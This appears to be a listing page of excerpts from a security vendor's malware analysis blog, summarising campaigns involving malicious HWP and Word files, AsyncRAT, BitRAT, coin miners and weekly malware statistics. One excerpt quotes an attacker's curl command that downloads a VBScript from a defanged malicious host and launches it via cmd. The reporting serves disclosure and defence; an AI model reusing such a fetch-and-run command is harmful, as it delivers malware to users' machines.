HWP File Disguised as Personal Profile Form (OLE Object)
The ASEC analysis team has recently identified a malicious HWP file that exploits OLE objects and flash vulnerabilities. The file uses a malicious URL identified in 2020. This URL contains a flash vulnerability (CVE-2018-15982) file, which requires users to take caution. The identified HWP file includes OLE objects, and the
Malicious HWP File Disguised as a Happy Birthday Message (OLE Object)
The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows: curl -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp cmd /c
Malicious Word Files Targeting Specific Individuals Related to North Korea
The ASEC analysis team has discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea. It is likely that this attack is being perpetrated
ASEC Weekly Malware Statistics (August 8th, 2022 – August 14th, 2022)
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 8th, 2022 (Monday) to August 14th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.9%, followed by backdoor with 38.4%,
ASEC Weekly Malware Statistics (August 1st, 2022 – August 7th, 2022)
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 1st, 2022 (Monday) to August 7th, 2022 (Sunday). For the main category, info-stealer ranked top with 47.4%, followed by backdoor with 22.6%,
AsyncRAT Being Distributed in Fileless Form
The ASEC analysis team has recently discovered that malicious AsyncRAT codes are being distributed in fileless form. The distributed AsyncRAT is executed in fileless form through multiple script files and is thought to be distributed as a compressed file attachment in emails. AsyncRAT is an open-source RAT malware developed with
RAT Tool Disguised as Solution File (*.sln) Being Distributed on Github
The ASEC analysis team has recently discovered the distribution of a RAT Tool disguised as a solution file (*.sln) on GitHub. As shown in Figure 1, the malware distributor is sharing a source code on GitHub titled “Jpg Png Exploit Downloader Fud Cryter Malware Builder Cve 2022”. The file composition
BitRAT and XMRig CoinMiner Being Distributed via Windows License Verification Tool
The ASEC analysis team has recently discovered the distribution of BitRAT and XMRig CoinMiner disguised as a Windows license verification tool. As introduced in previous posts, BitRAT has a history of being distributed on webhards as MS Windows license verification tools and MS Office installation programs. It is likely that
Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies
Recently, there have been frequent incidents where attackers infiltrated and took control of the internal network of Korean companies, starting with vulnerable servers externally exposed. Cases of Attacks Targeting Vulnerable Atlassian Confluence Servers Meterpreter Distributed to Vulnerable Server of Korean Medical Institution AsyncRAT Being Distributed to Vulnerable MySQL Servers This
ASEC Weekly Malware Statistics (July 25th, 2022 – July 31st, 2022)
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from July 25th, 2022 (Monday) to July 31st, 2022 (Sunday). For the main category, info-stealer ranked top with 38.6%, followed by backdoor with 38.1%,
